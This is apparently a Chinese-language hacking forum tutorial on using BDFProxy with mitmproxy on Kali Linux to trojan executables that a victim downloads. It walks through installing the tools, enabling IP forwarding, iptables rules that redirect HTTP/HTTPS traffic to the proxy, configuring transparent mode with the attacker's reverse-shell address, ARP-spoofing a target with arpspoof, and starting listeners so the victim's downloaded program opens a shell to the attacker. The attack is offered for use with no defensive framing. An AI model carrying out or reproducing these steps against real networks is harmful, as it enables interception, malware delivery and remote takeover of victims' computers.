中间人攻击-BDFPoxy植入木马

admin

BDFPRoxy：以前听学姐说kali里面有个软件可以中间人攻击直接在EXE里面注入后门，现在终于知道原来是这个鬼。当然它也支持Linux呀！

原理：

如图：本来受害者是通过网关去外网的服务下载软件，此时服务器上的软件是安全的，所以不出意外受害者下载的软件也就是安全的！

但是，前面已经学了中间人攻击，例如（mitmproxy），当流量经由攻击者的电脑，那么攻击者可以时刻监视着受害者的数据。

这里的监听是，接收受害者的请求，并过滤内容，然后转发到目标地址，一旦发现是请求可执行文件，就先自己下载，然后植入后门，再返回给受害者！

这里发现了一个****.exe的请求

然后会做如下操作

收集信息，然后打补丁，最后转发给用户（和backdoor-factory一样的）

这时用户下载到的程序就是被植入木马的！

开始：

Kali自带，需要的话可手动安装：

1. apt-get update
   
2. apt-get install backdoor-factory
   
3. apt-get install mitmproxy
   
4. apt-get install bdfproxy

复制代码

步骤：

1. echo 1 > /proc/sys/net/ipv4/ip_forward #开启数据转发
   
2. iptables -L -t nat #首先查看iptables里面有没有规则，有的话需要清空以免影响
   
3. iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-ports 8080
   
4. iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-ports 8080 #在PREROUTING链路上使用nat表，将原来到80,443的非本机数据重定向到本机的8080端口（即bdfproxy监听端口）
   
5. iptables -L -t nat #再次检查确保正确

复制代码

修改配置文件

1. gedit /etc/bdfproxy/bdfproxy.cfg

复制代码

将里面的[Overall]修改如下

proxyMode = transparent  # Modes: regular or None (for libmproxy < 13), socks5, transparent, reverse, upstream

然后将所有存在的ip地址改为要接受反弹shell的ip地址（一般为kali本机）（这里的ip地址默认为192.168.1.16）

开始欺骗目标，实现中间人攻击

1. arpspoof –I eth0 –t 192.168.0.106 192.168.0.1

复制代码

开启bdfproxy

这里会生成一个资源文件，里面包含很多msfconsole命令（因为它对很多平台进行注入，每个平台的payload不一样，所以他会对每个平台的payload开放不同的监听端口，如下图）

开启对反弹shell的监听（监听后才会出现上图所示的端口）

此时在官网下载软件后，运行直接取得shell

补充

这里不一定用这种方法，想搭钓鱼WiFi，dns欺骗等等，这要能实现中间人攻击的都可以。

backdoor-factory介绍：https://www.chinabaiker.com/thread-2846-1-1.html